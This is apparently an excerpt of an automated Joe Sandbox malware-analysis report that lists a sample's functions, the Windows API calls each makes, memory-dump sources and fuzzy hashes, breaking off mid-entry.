                    • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
                    • Opcode Fuzzy Hash: b3528aa481f7fcb0eb8522191f92e70b5ace6c5fa3869cfeab60d5d6ffa76828
                    • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                    Function 00478093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 004780C3
                    • CoUninitialize.OLE32 ref: 004780CE
                      • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                    • VariantInit.OLEAUT32(?), ref: 004780D9
                    • VariantClear.OLEAUT32(?), ref: 004783AA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                    • String ID:
                    • API String ID: 780911581-0
                    • Opcode ID: e0598b6a95aabee3d6d7fa6bb81cfef96e97d1b35fca084c28bd1702e1ced289
                    • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                    • Opcode Fuzzy Hash: e0598b6a95aabee3d6d7fa6bb81cfef96e97d1b35fca084c28bd1702e1ced289
                    • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                    Function 0045687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    • Opcode ID: 1a73f5e827cafa9a32e666fb2eece23f75d1219170068d3f03f0e50f057af89d
                    • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                    • Opcode Fuzzy Hash: 1a73f5e827cafa9a32e666fb2eece23f75d1219170068d3f03f0e50f057af89d
                    • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                    Function 004897F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(00BA3150,?), ref: 00489863
                    • ScreenToClient.USER32(00000002,00000002), ref: 00489896
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00489903
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    • Opcode ID: 64022f8d4441c5f1557efdd9fcc3a986e2e7d97cfab57cf70d5a2593d4a8891b
                    • Instruction ID: e3f881a7cdcc43810cee46c2a40b043201eea1d37e41385612dd6f56ef4f9ac2
                    • Opcode Fuzzy Hash: 64022f8d4441c5f1557efdd9fcc3a986e2e7d97cfab57cf70d5a2593d4a8891b
                    • Instruction Fuzzy Hash: 6B513E74A00609AFCB10EF54C884ABE7BB5FF45360F14866EF855AB3A0D734AD91CB94
                    Function 004769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                    Download Yara Rule
                    APIs
                    • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                    • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                    • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorLast$__itow__swprintfsocket
                    • String ID:
                    • API String ID: 2214342067-0
                    • Opcode ID: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                    • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                    • Opcode Fuzzy Hash: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                    • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                    Function 0047641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                    Download Yara Rule
                    APIs
                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                    • _strlen.LIBCMT ref: 004764D9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID:
                    • API String ID: 4218353326-0
                    • Opcode ID: 092f116c2936bc2b87017b652f83589aa4a7c30a877edbafeb18071167529c0a
                    • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                    • Opcode Fuzzy Hash: 092f116c2936bc2b87017b652f83589aa4a7c30a877edbafeb18071167529c0a
                    • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                    Function 0046B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0046B89E
                    • GetLastError.KERNEL32(?,00000000), ref: 0046B8C4
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0046B8E9
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0046B915
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    • Opcode ID: 8c509dae0351cb0f1ead8c0d9691e3f66f8983daa8a4ab2c48e0df630e8b2899
                    • Instruction ID: 5b86d2e11fb278bd4ab993ead48be06bf9d9dcf949e57147c6f090c5708de813
                    • Opcode Fuzzy Hash: 8c509dae0351cb0f1ead8c0d9691e3f66f8983daa8a4ab2c48e0df630e8b2899
                    • Instruction Fuzzy Hash: C441097A600610DFCB11EF15C444A59BBE1EF49314F05C0AAEC4AAB3A2DB38FD45CB99
                    Function 00488851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                    • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                    • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                    • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                    Function 0048AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                    Download Yara Rule
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 0048AB60
                    • GetWindowRect.USER32(?,?), ref: 0048ABD6
                    • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                    • MessageBeep.USER32(00000000), ref: 0048AC57
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                    • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                    • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                    • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                    Function 00460AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                    • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                    • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                    • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                    Function 00460C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00460C66
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00460D33
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                    • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                    • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                    • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                    Function 004361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                    • __isleadbyte_l.LIBCMT ref: 00436229
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                    • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                    • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                    • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                    Function 00484EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32 ref: 00484F02
                      • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                      • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                      • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                    • GetCaretPos.USER32(?), ref: 00484F13
                    • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                    • GetForegroundWindow.USER32 ref: 00484F54
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                    • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                    • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                    • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                    Function 0048C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • GetCursorPos.USER32(?), ref: 0048C4D2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                    • GetCursorPos.USER32(?), ref: 0048C534
                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                    • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                    • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                    • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                    Function 00458656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                      • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                      • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                      • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                      • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                    • _memcmp.LIBCMT ref: 004586C6
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                    • HeapFree.KERNEL32(00000000), ref: 00458703
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 1592001646-0
                    • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                    • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                    • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                    • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                    Function 0042098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                    Download Yara Rule
                    APIs
                    • __setmode.LIBCMT ref: 004209AE
                      • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                      • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                    • _fprintf.LIBCMT ref: 004209E5
                    • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                      • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                    • __setmode.LIBCMT ref: 00420A1A
                    Memory Dump Source
